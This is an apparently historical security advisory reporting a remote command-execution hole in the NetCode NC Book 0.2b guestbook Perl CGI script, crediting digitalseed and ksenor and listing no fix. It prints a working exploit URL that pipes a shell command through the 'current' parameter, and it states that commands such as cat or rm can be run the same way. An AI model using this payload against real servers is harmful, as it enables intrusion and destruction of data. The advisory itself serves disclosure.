COMMAND

    NC Book

SYSTEMS AFFECTED

    NetCode NC Book 0.2b

PROBLEM

    'digitalseed' posted  following.   A pretty  big hole  in the main
    script of that guestbook leads to command execution on the  remote
    server running this vulnerable perl script.  Exploit:

        http://target/cgi-bin/ncbook/book.cgi?action=default¤t=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10

    The  above  line  if  given  will  output the file contents of the
    kernel dir.  Also you can execute any commands (ls, cat, rm  etc).
    Original discovery: digitalseed and ksenor.

SOLUTION

    Nothing yet.